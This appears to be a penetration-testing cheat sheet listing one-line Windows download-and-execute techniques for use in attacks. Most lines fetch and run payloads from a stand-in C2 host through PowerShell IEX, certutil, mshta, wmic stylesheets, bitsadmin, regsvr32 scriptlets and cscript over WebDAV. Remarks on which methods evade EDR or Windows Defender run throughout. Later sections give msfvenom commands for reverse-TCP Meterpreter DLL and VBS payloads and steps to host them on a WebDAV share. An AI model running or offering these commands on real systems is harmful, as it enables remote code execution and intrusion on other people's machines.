
Single line commands to download and execute malicious code are useful for a number of reasons;
- To exploit web application vulnerabilities, such as shell command injection
- When you have the ability to execute commands, but not directly copy files (via WMI for instance)
- To embed in other attack packages, such as Macro based malware or USD HID attacks
Having multiple techniques is useful, as endpoint detection and response systems will typically use pattern matching rules to detect some of these.
PowerShell
Very likely to be detected by EDR solutions.
owershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://www.c2server.co.uk/script.ps1’);
Proxy Aware Version
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://c2server.co.uk/script.ps1')|iex"
Base64 Encoded
Powershell -W Hidden -nop -noni -enc <base64 text>
Payload Generation
To base64 encode PowerShell scripts, use:
iconv -f ASCII -t UTF-16LE powershellscript.txt | base64 | tr -d "\n"
Certutil
Windows Defender picks up on this technique.
certutil -urlcache -split -f http://www.c2server.co.uk/bg.exe bg.exe && bg.exe.
MSHTA
mshta http://www.c2server.co.uk/script.hta
WMIC
Windows Defender picks up on this technique.
wmic os get /format:"http://www.c2server.co.uk/stylesheet.xsl"
Payload Generation
Stylesheet to load calc.exe:
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl"> <xsl:script language="VBScript"> <![CDATA[Set shl = CreateObject("Wscript.Shell")Call shl.Run("""calc.exe""")]]> </xsl:script>< xsl:template match="/"> <xsl:apply-templates select="//RESULTS"/> <xsl:apply-templates select="//INSTANCE"/> <xsl:eval no-entities="true" language="VBScript">DisplayValues(this)</xsl:eval> </xsl:template> <xsl:template match="RESULTS"> <xsl:eval no-entities="true" language="VBScript">CountResults(this)</xsl:eval> </xsl:template> <xsl:template match="INSTANCE"> <xsl:eval language="VBScript">GotInstance()</xsl:eval> <xsl:apply-templates select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"/></xsl:template></xsl:stylesheet>
Bitsadmin
bitsadmin /rawreturn /transfer payload http://www.c2server/bg.exe %cd%\bg.exe && bg.exe
If you get an error like 0x80070057, this may be because the output path is incorrectly specified, or isn’t writable.
Rundll32
rundll32 \\webdavserver\folder\payload.dll,DLLMain
Payload Generation
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f DLL > /var/www/webdav/payload.dll
Regsvr32
Windows Defender picks up on this technique.
regsvr32 /u /n /s /i:http://www.c2server.co.uk/test.html scrobj.dll
Payload Generation
Contents of test.html:
<?XML version="1.0"?> <scriptlet> <registrationprogid="foo"classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <script language="JScript"> <![CDATA[var r = new ActiveXObject("WScript.Shell").Run("cmd /k echo bordergate_test");]]> </script> </registration> </scriptlet>
Cscript
This requires reading a file from a WebDav share:
cscript //E:vbscript \\www.c2server.co.uk\webdav\test.vbs
WebDav Share Configuration in Kali
sudo apt install -y davfs2sudo a2enmod davsudo a2enmod dav_fssudo mkdir /var/www/webdavsudo chown -R www-data:www-data /var/www/
Edit Apache Config File
/etc/apache2/sites-available/000-default.conf
Add to top of file:
DavLockDB /var/www/DavLock
Add to VirtualHost section:
Alias /webdav /var/www/webdav <Directory /var/www/webdav> DAV On </Directory>
Testing
cadaver http://127.0.0.1/webdav
Generate VBS Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f vbs --arch x86 --platform win